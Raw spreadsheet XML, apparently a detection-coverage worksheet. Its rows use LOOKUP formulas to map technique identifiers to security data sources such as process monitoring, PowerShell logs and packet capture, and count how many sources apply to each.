        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E224" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F224" s="13"/>
      <c r="G224" s="19"/>
    </row>
    <row r="225" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A225" s="16" t="s">
        <v>1386</v>
      </c>
      <c r="B225" s="13" t="str">
        <f>LOOKUP(A225,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C225" s="17">
        <v>100</v>
      </c>
      <c r="D225" s="13">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E225" s="13">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F225" s="13"/>
      <c r="G225" s="19"/>
    </row>
    <row r="226" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A226" s="16" t="s">
        <v>1390</v>
      </c>
      <c r="B226" s="13" t="str">
        <f>LOOKUP(A226,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C226" s="17" t="s">
        <v>1489</v>
      </c>
      <c r="D226" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E226" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F226" s="13"/>
      <c r="G226" s="19"/>
    </row>
    <row r="227" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A227" s="16" t="s">
        <v>1395</v>
      </c>
      <c r="B227" s="13" t="str">
        <f>LOOKUP(A227,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Packet capture,Network device logs,Netflow/Enclave netflow,DNS records</v>
      </c>
      <c r="C227" s="17" t="s">
        <v>1490</v>
      </c>
      <c r="D227" s="13">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E227" s="13">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="F227" s="13"/>
      <c r="G227" s="19"/>
    </row>
    <row r="228" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A228" s="16" t="s">
        <v>1400</v>
      </c>
      <c r="B228" s="13" t="str">
        <f>LOOKUP(A228,'REF-DataSources'!A:C)</f>
        <v>Windows event logs</v>
      </c>
      <c r="C228" s="17">
        <v>100</v>
      </c>
      <c r="D228" s="13">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E228" s="13">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F228" s="13"/>
      <c r="G228" s="19"/>
    </row>
    <row r="229" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A229" s="16" t="s">
        <v>1404</v>
      </c>
      <c r="B229" s="13" t="str">
        <f>LOOKUP(A229,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C229" s="17" t="s">
        <v>93</v>
      </c>
      <c r="D229" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E229" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F229" s="13"/>
      <c r="G229" s="19"/>
    </row>
    <row r="230" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A230" s="16" t="s">
        <v>1410</v>
      </c>
      <c r="B230" s="13" t="str">
        <f>LOOKUP(A230,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C230" s="17" t="s">
        <v>1491</v>
      </c>
      <c r="D230" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E230" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F230" s="13"/>
      <c r="G230" s="19"/>
    </row>
    <row r="231" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A231" s="16" t="s">
        <v>1415</v>
      </c>
      <c r="B231" s="13" t="str">
        <f>LOOKUP(A231,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,MBR</v>
      </c>
      <c r="C231" s="17" t="s">
        <v>103</v>
      </c>
      <c r="D231" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E231" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F231" s="13"/>
      <c r="G231" s="19"/>
    </row>
    <row r="232" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A232" s="16" t="s">
        <v>1420</v>
      </c>
      <c r="B232" s="13" t="str">
        <f>LOOKUP(A232,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C232" s="17" t="s">
        <v>70</v>
      </c>
      <c r="D232" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E232" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F232" s="13"/>
      <c r="G232" s="19"/>
    </row>
    <row r="233" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A233" s="16" t="s">
        <v>1425</v>
      </c>
      <c r="B233" s="13" t="str">
        <f>LOOKUP(A233,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Windows Registry,API monitoring</v>
      </c>
      <c r="C233" s="17" t="s">
        <v>8</v>
      </c>
      <c r="D233" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E233" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F233" s="13"/>
      <c r="G233" s="19"/>
    </row>
    <row r="234" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A234" s="16" t="s">
        <v>1430</v>
      </c>
      <c r="B234" s="13" t="str">
        <f>LOOKUP(A234,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Services,Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C234" s="17" t="s">
        <v>30</v>
      </c>
      <c r="D234" s="13">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E234" s="13">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="F234" s="13"/>
      <c r="G234" s="19"/>
    </row>
    <row r="235" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A235" s="16" t="s">
        <v>1435</v>
      </c>
      <c r="B235" s="13" t="str">
        <f>LOOKUP(A235,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Web application firewall logs,Web logs,Packet capture</v>
      </c>
      <c r="C235" s="17" t="s">
        <v>97</v>
      </c>
      <c r="D235" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E235" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F235" s="13"/>
      <c r="G235" s="19"/>
    </row>
    <row r="236" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A236" s="16" t="s">
        <v>1440</v>
      </c>
      <c r="B236" s="13" t="str">
        <f>LOOKUP(A236,'REF-DataSources'!A:C)</f>
        <v>Application logs,File monitoring</v>
      </c>
      <c r="C236" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D236" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E236" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F236" s="13"/>
      <c r="G236" s="19"/>
    </row>
    <row r="237" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A237" s="16" t="s">
        <v>1445</v>
      </c>
      <c r="B237" s="13" t="str">
        <f>LOOKUP(A237,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network protocol analysis</v>
      </c>
      <c r="C237" s="17" t="s">
        <v>18</v>
      </c>
      <c r="D237" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E237" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F237" s="13"/>
      <c r="G237" s="19"/>
    </row>
    <row r="238" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A238" s="16" t="s">
        <v>1450</v>
      </c>
      <c r="B238" s="13" t="str">
        <f>LOOKUP(A238,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C238" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D238" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E238" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F238" s="13"/>
      <c r="G238" s="19"/>
    </row>
    <row r="239" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A239" s="16" t="s">
        <v>1454</v>
      </c>
      <c r="B239" s="13" t="str">
        <f>LOOKUP(A239,'REF-DataSources'!A:C)</f>
        <v>BIOS,Component firmware</v>
      </c>
      <c r="C239" s="17" t="s">
        <v>222</v>
      </c>
      <c r="D239" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E239" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F239" s="13"/>
      <c r="G239" s="19"/>
    </row>
    <row r="240" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A240" s="16" t="s">
        <v>1459</v>
      </c>
      <c r="B240" s="13" t="str">
        <f>LOOKUP(A240,'REF-DataSources'!A:C)</f>
        <v>Process use of network,Process monitoring,Network protocol analysis,Network device logs</v>
      </c>
      <c r="C240" s="17" t="s">
        <v>1492</v>
      </c>
      <c r="D240" s="13">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E240" s="13">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F240" s="13"/>
      <c r="G240" s="19"/>
    </row>
    <row r="241" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A241" s="16" t="s">
        <v>1464</v>
      </c>
      <c r="B241" s="13" t="str">
        <f>LOOKUP(A241,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C241" s="17" t="s">
        <v>18</v>
      </c>
      <c r="D241" s="13">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E241" s="13">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F241" s="13"/>
      <c r="G241" s="19"/>
    </row>
    <row r="242" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A242" s="16" t="s">
        <v>1469</v>
      </c>
      <c r="B242" s="13" t="str">
        <f>LOOKUP(A242,'REF-DataSources'!A:C)</f>
        <v>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</v>
      </c>
      <c r="C242" s="17" t="s">
        <v>30</v>
      </c>
      <c r="D242" s="13">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E242" s="13">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="F242" s="13"/>
      <c r="G242" s="19"/>
    </row>
    <row r="243" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A243" s="16" t="s">
        <v>1474</v>
      </c>
      <c r="B243" s="13" t="str">
        <f>LOOKUP(A243,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Web logs,Web application firewall logs,Network intrusion detection system,Network protocol analysis,Network device logs,Netflow/Enclave netflow</v>
      </c>
      <c r="C243" s="17" t="s">
        <v>1493</v>
      </c>
      <c r="D243" s="13">
        <f t="shared" si="7"/>
        <v>7</v>
      </c>
      <c r="E243" s="13">
        <f t="shared" si="8"/>
        <v>7</v>
      </c>
      <c r="F243" s="13"/>
      <c r="G243" s="19"/>
    </row>
    <row r="244" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A244" s="16" t="s">
        <v>1479</v>
      </c>
      <c r="B244" s="13" t="str">
        <f>LOOKUP(A244,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C244" s="17" t="s">
        <v>37</v>
      </c>
      <c r="D244" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E244" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F244" s="13"/>
      <c r="G244" s="19"/>
    </row>
    <row r="245" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A245" s="16" t="s">
        <v>1484</v>
      </c>
      <c r="B245" s="13" t="str">
        <f>LOOKUP(A245,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C245" s="17" t="s">
        <v>37</v>
      </c>
      <c r="D245" s="13">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E245" s="13">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F245" s="13"/>
      <c r="G245" s="19"/>
    </row>
    <row r="246" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A246" s="13"/>
      <c r="B246" s="13"/>
      <c r="C246" s="17"/>
      <c r="D246" s="13"/>
      <c r="E246" s="13"/>
      <c r="F246" s="13"/>
      <c r="G246" s="19"/>
    </row>
    <row r="247" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A247" s="13"/>
      <c r="B247" s="13"/>
      <c r="C247" s="17"/>
      <c r="D247" s="13"/>
      <c r="E247" s="13"/>
      <c r="F247" s="13"/>
      <c r="G247" s="19"/>
    </row>
    <row r="248" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A248" s="13"/>
      <c r="B248" s="13"/>
      <c r="C248" s="17"/>
      <c r="D248" s="13"/>
      <c r="E248" s="13"/>
      <c r="F248" s="13"/>
      <c r="G248" s="19"/>
    </row>
    <row r="249" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A249" s="13"/>
      <c r="B249" s="13"/>
      <c r="C249" s="17"/>
      <c r="D249" s="13"/>
      <c r="E249" s="13"/>
      <c r="F249" s="13"/>
      <c r="G249" s="19"/>
    </row>
    <row r="250" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A250" s="13"/>
      <c r="B250" s="13"/>
      <c r="C250" s="17"/>
      <c r="D250" s="13"/>
      <c r="E250" s="13"/>
      <c r="F250" s="13"/>
      <c r="G250" s="19"/>
    </row>
    <row r="251" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A251" s="13"/>
      <c r="B251" s="13"/>
      <c r="C251" s="17"/>
      <c r="D251" s="13"/>
      <c r="E251" s="13"/>
      <c r="F251" s="13"/>
      <c r="G251" s="19"/>
    </row>
    <row r="252" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A252" s="13"/>
      <c r="B252" s="13"/>
      <c r="C252" s="17"/>
      <c r="D252" s="13"/>
      <c r="E252" s="13"/>
      <c r="F252" s="13"/>
      <c r="G252" s="19"/>
    </row>
    <row r="253" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A253" s="13"/>
      <c r="B253" s="13"/>
      <c r="C253" s="17"/>
      <c r="D253" s="13"/>
      <c r="E253" s="13"/>
      <c r="F253" s="13"/>
      <c r="G253" s="19"/>
    </row>
    <row r="254" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A254" s="13"/>
      <c r="B254" s="13"/>
      <c r="C254" s="17"/>
      <c r="D254" s="13"/>
      <c r="E254" s="13"/>
      <c r="F254" s="13"/>
      <c r="G254" s="19"/>
    </row>
    <row r="255" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A255" s="13"/>
      <c r="B255" s="13"/>
      <c r="C255" s="17"/>
      <c r="D255" s="13"/>
      <c r="E255" s="13"/>
      <c r="F255" s="13"/>
      <c r="G255" s="19"/>
    </row>
    <row r="256" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A256" s="13"/>
      <c r="B256" s="13"/>
      <c r="C256" s="17"/>
      <c r="D256" s="13"/>
      <c r="E256" s="13"/>
      <c r="F256" s="13"/>
      <c r="G256" s="19"/>
    </row>
    <row r="257" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A257" s="13"/>
      <c r="B257" s="13"/>
      <c r="C257" s="17"/>
      <c r="D257" s="13"/>
      <c r="E257" s="13"/>
      <c r="F257" s="13"/>
      <c r="G257" s="19"/>
    </row>
    <row r="258" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A258" s="13"/>
      <c r="B258" s="13"/>
      <c r="C258" s="17"/>
      <c r="D258" s="13"/>
      <c r="E258" s="13"/>
      <c r="F258" s="13"/>
      <c r="G258" s="19"/>
    </row>
    <row r="259" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A259" s="13"/>
      <c r="B259" s="13"/>
      <c r="C259" s="17"/>
      <c r="D259" s="13"/>
      <c r="E259" s="13"/>
      <c r="F259" s="13"/>
      <c r="G259" s="19"/>
    </row>
    <row r="260" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A260" s="13"/>
      <c r="B260" s="13"/>
      <c r="C260" s="17"/>
      <c r="D260" s="13"/>
      <c r="E260" s="13"/>
      <c r="F260" s="13"/>
      <c r="G260" s="19"/>
    </row>
    <row r="261" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A261" s="13"/>
      <c r="B261" s="13"/>
      <c r="C261" s="17"/>
      <c r="D261" s="13"/>
      <c r="E261" s="13"/>
      <c r="F261" s="13"/>
      <c r="G261" s="19"/>
    </row>
    <row r="262" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A262" s="13"/>
      <c r="B262" s="13"/>
      <c r="C262" s="17"/>
      <c r="D262" s="13"/>
      <c r="E262" s="13"/>
      <c r="F262" s="13"/>
      <c r="G262" s="19"/>
    </row>
    <row r="263" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A263" s="13"/>
      <c r="B263" s="13"/>
      <c r="C263" s="17"/>
      <c r="D263" s="13"/>
      <c r="E263" s="13"/>
      <c r="F263" s="13"/>
      <c r="G263" s="19"/>
    </row>
    <row r="264" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A264" s="13"/>
      <c r="B264" s="13"/>
      <c r="C264" s="17"/>
      <c r="D264" s="13"/>
      <c r="E264" s="13"/>
      <c r="F264" s="13"/>
      <c r="G264" s="19"/>
    </row>
    <row r="265" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A265" s="13"/>
      <c r="B265" s="13"/>
      <c r="C265" s="17"/>
      <c r="D265" s="13"/>
      <c r="E265" s="13"/>
      <c r="F265" s="13"/>
      <c r="G265" s="19"/>
    </row>
    <row r="266" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A266" s="13"/>
      <c r="B266" s="13"/>
      <c r="C266" s="17"/>
      <c r="D266" s="13"/>
      <c r="E266" s="13"/>
      <c r="F266" s="13"/>
      <c r="G266" s="19"/>
    </row>
    <row r="267" spans="1:7" x14ac:dyDescent="0.25">
      <c r="A267" s="13"/>
      <c r="B267" s="13"/>
      <c r="C267" s="17"/>
      <c r="D267" s="13"/>
      <c r="E267" s="13"/>
      <c r="F267" s="13"/>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45"/>
  <sheetViews>
    <sheetView topLeftCell="A208" workbookViewId="0">
      <selection activeCell="C242" sqref="C242"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="12" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="9.140625" style="13" customWidth="1"/>
    <col min="2" max="2" width="54.7109375" style="13" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="124" style="13" customWidth="1"/>
    <col min="4" max="4" width="25.5703125" style="13" customWidth="1"/>
    <col min="5" max="5" width="99.85546875" style="13" customWidth="1"/>
    <col min="6" max="6" width="50.28515625" style="13" customWidth="1"/>
    <col min="7" max="7" width="40.85546875" style="13" customWidth="1"/>
    <col min="8" max="8" width="9.140625" style="13" customWidth="1"/>
    <col min="9" max="16384" width="9.140625" style="13"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A1" s="13" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="13" t="s">
        <v>538</v>
      </c>
      <c r="C1" s="13" t="s">
        <v>1</v>
      </c>
      <c r="D1" s="13" t="s">
        <v>539</v>
      </c>
      <c r="E1" s="13" t="s">
        <v>540</v>
      </c>
      <c r="F1" s="13" t="s">
        <v>541</v>
      </c>
      <c r="G1" s="13" t="s">
        <v>542</v>
      </c>
    </row>
    <row r="2" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A2" s="13" t="s">
        <v>7</v>
      </c>
      <c r="B2" s="13" t="s">
        <v>543</v>
      </c>
      <c r="C2" s="13" t="s">
        <v>544</v>
      </c>
      <c r="D2" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E2" s="13" t="s">
        <v>546</v>
      </c>
      <c r="F2" s="13" t="s">
        <v>547</v>
      </c>
      <c r="G2" s="13" t="s">
        <v>548</v>
      </c>
    </row>
    <row r="3" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A3" s="13" t="s">
        <v>9</v>
      </c>
      <c r="B3" s="13" t="s">
        <v>549</v>
      </c>
      <c r="C3" s="13" t="s">
        <v>550</v>
      </c>
      <c r="D3" s="13" t="s">
        <v>551</v>
      </c>
      <c r="E3" s="13" t="s">
        <v>552</v>
      </c>
      <c r="F3" s="13" t="s">
        <v>553</v>
      </c>
      <c r="G3" s="13" t="s">
        <v>554</v>
      </c>
    </row>
    <row r="4" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A4" s="13" t="s">
        <v>11</v>
      </c>
      <c r="B4" s="13" t="s">
        <v>555</v>
      </c>
      <c r="C4" s="13" t="s">
        <v>556</v>
      </c>
      <c r="D4" s="13" t="s">
        <v>557</v>
      </c>
      <c r="E4" s="13" t="s">
        <v>558</v>
      </c>
      <c r="F4" s="13" t="s">
        <v>559</v>
      </c>
      <c r="G4" s="13" t="s">
        <v>560</v>
      </c>
    </row>
    <row r="5" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A5" s="13" t="s">
        <v>12</v>
      </c>
      <c r="B5" s="13" t="s">
        <v>561</v>
      </c>
      <c r="C5" s="13" t="s">
        <v>562</v>
      </c>
      <c r="D5" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E5" s="13" t="s">
        <v>564</v>
      </c>
      <c r="F5" s="13" t="s">
        <v>565</v>
      </c>
      <c r="G5" s="13" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="6" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A6" s="13" t="s">
        <v>14</v>
      </c>
      <c r="B6" s="13" t="s">
        <v>567</v>
      </c>
      <c r="C6" s="13" t="s">
        <v>568</v>
      </c>
      <c r="D6" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E6" s="13" t="s">
        <v>569</v>
      </c>
      <c r="F6" s="13" t="s">
        <v>570</v>
      </c>
      <c r="G6" s="13" t="s">
        <v>571</v>
      </c>
    </row>
    <row r="7" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A7" s="13" t="s">
        <v>16</v>
      </c>
      <c r="B7" s="13" t="s">
        <v>572</v>
      </c>
      <c r="C7" s="13" t="s">
        <v>452</v>
      </c>
      <c r="D7" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E7" s="13" t="s">
        <v>573</v>
      </c>
      <c r="F7" s="13" t="s">
        <v>574</v>
      </c>
      <c r="G7" s="13" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="8" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A8" s="13" t="s">
        <v>17</v>
      </c>
      <c r="B8" s="13" t="s">
        <v>576</v>
      </c>
      <c r="C8" s="13" t="s">
        <v>577</v>
      </c>
      <c r="D8" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E8" s="13" t="s">
        <v>578</v>
      </c>
      <c r="F8" s="13" t="s">
        <v>579</v>
      </c>
      <c r="G8" s="13" t="s">
        <v>580</v>
      </c>
    </row>
    <row r="9" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A9" s="13" t="s">
        <v>19</v>
      </c>
      <c r="B9" s="13" t="s">
        <v>581</v>
      </c>
      <c r="C9" s="13" t="s">
        <v>582</v>
      </c>
      <c r="D9" s="13" t="s">
        <v>551</v>
      </c>
      <c r="E9" s="13" t="s">
        <v>546</v>
      </c>
      <c r="F9" s="13" t="s">
        <v>583</v>
      </c>
      <c r="G9" s="13" t="s">
        <v>548</v>
      </c>
    </row>
    <row r="10" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A10" s="13" t="s">
        <v>21</v>
      </c>
      <c r="B10" s="13" t="s">
        <v>584</v>
      </c>
      <c r="C10" s="13" t="s">
        <v>585</v>
      </c>
      <c r="D10" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E10" s="13" t="s">
        <v>586</v>
      </c>
      <c r="F10" s="13" t="s">
        <v>587</v>
      </c>
      <c r="G10" s="13" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="11" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A11" s="13" t="s">
        <v>23</v>
      </c>
      <c r="B11" s="13" t="s">
        <v>588</v>
      </c>
      <c r="C11" s="13" t="s">
        <v>589</v>
      </c>
      <c r="D11" s="13" t="s">
        <v>590</v>
      </c>
      <c r="E11" s="13" t="s">
        <v>591</v>
      </c>
      <c r="F11" s="13" t="s">
        <v>592</v>
      </c>
      <c r="G11" s="13" t="s">
        <v>580</v>
      </c>
    </row>
    <row r="12" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A12" s="13" t="s">
        <v>25</v>
      </c>
      <c r="B12" s="13" t="s">
        <v>593</v>
      </c>
      <c r="C12" s="13" t="s">
        <v>594</v>
      </c>
      <c r="D12" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E12" s="13" t="s">
        <v>595</v>
      </c>
      <c r="F12" s="13" t="s">
        <v>596</v>
      </c>
      <c r="G12" s="13" t="s">
        <v>554</v>
      </c>
    </row>
    <row r="13" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A13" s="13" t="s">
        <v>27</v>
      </c>
      <c r="B13" s="13" t="s">
        <v>597</v>
      </c>
      <c r="C13" s="13" t="s">
        <v>598</v>
      </c>
      <c r="D13" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E13" s="13" t="s">
        <v>599</v>
      </c>
      <c r="F13" s="13" t="s">
        <v>600</v>
      </c>
      <c r="G13" s="13" t="s">
        <v>580</v>
      </c>
    </row>
    <row r="14" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A14" s="13" t="s">
        <v>29</v>
      </c>
      <c r="B14" s="13" t="s">
        <v>601</v>
      </c>
      <c r="C14" s="13" t="s">
        <v>602</v>
      </c>
      <c r="D14" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E14" s="13" t="s">
        <v>603</v>
      </c>
      <c r="F14" s="13" t="s">
        <v>604</v>
      </c>
      <c r="G14" s="13" t="s">
        <v>605</v>
      </c>
    </row>
    <row r="15" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A15" s="13" t="s">
        <v>31</v>
      </c>
      <c r="B15" s="13" t="s">
        <v>606</v>
      </c>
      <c r="C15" s="13" t="s">
        <v>607</v>
      </c>
      <c r="D15" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E15" s="13" t="s">
        <v>608</v>
      </c>
      <c r="F15" s="13" t="s">
        <v>609</v>
      </c>
      <c r="G15" s="13" t="s">
        <v>575</v>
      </c>
    </row>
    <row r="16" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A16" s="13" t="s">
        <v>33</v>
      </c>
      <c r="B16" s="13" t="s">
        <v>610</v>
      </c>
      <c r="C16" s="13" t="s">
        <v>562</v>
      </c>
      <c r="D16" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E16" s="13" t="s">
        <v>611</v>
      </c>
      <c r="F16" s="13" t="s">
        <v>612</v>
      </c>
      <c r="G16" s="13" t="s">
        <v>605</v>
      </c>
    </row>
    <row r="17" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A17" s="13" t="s">
        <v>35</v>
      </c>
      <c r="B17" s="13" t="s">
        <v>613</v>
      </c>
      <c r="C17" s="13" t="s">
        <v>577</v>
      </c>
      <c r="D17" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E17" s="13" t="s">
        <v>614</v>
      </c>
      <c r="F17" s="13" t="s">
        <v>615</v>
      </c>
      <c r="G17" s="13" t="s">
        <v>580</v>
      </c>
    </row>
    <row r="18" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A18" s="13" t="s">
        <v>36</v>
      </c>
      <c r="B18" s="13" t="s">
        <v>616</v>
      </c>
      <c r="C18" s="13" t="s">
        <v>617</v>
      </c>
      <c r="D18" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E18" s="13" t="s">
        <v>618</v>
      </c>
      <c r="F18" s="13" t="s">
        <v>619</v>
      </c>
      <c r="G18" s="13" t="s">
        <v>620</v>
      </c>
    </row>
    <row r="19" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A19" s="13" t="s">
        <v>38</v>
      </c>
      <c r="B19" s="13" t="s">
        <v>621</v>
      </c>
      <c r="C19" s="13" t="s">
        <v>622</v>
      </c>
      <c r="D19" s="13" t="s">
        <v>545</v>
      </c>
      <c r="E19" s="13" t="s">
        <v>623</v>
      </c>
      <c r="F19" s="13" t="s">
        <v>624</v>
      </c>
      <c r="G19" s="13" t="s">
        <v>580</v>
      </c>
    </row>
    <row r="20" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A20" s="13" t="s">
        <v>40</v>
      </c>
      <c r="B20" s="13" t="s">
        <v>625</v>
      </c>
      <c r="C20" s="13" t="s">
        <v>626</v>
      </c>
      <c r="D20" s="13" t="s">
        <v>563</v>
      </c>
      <c r="E20" s="13" t="s">
        <v>627</v>
      </c>
      <c r="F20" s="13" t="s">
        <v>628</v>
      </c>
      <c r="G20" s="13" t="s">
        <v>566</v>
      </c>
    </row>
    <row r="21" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A21" s="13" t="s">
        <v>42</v>
      </c>
      <c r="B21" s="13" t="s">
        <v>629</v>
      </c>
      <c r="C21" s="13" t="s">
        <v>630</v>
      </c>
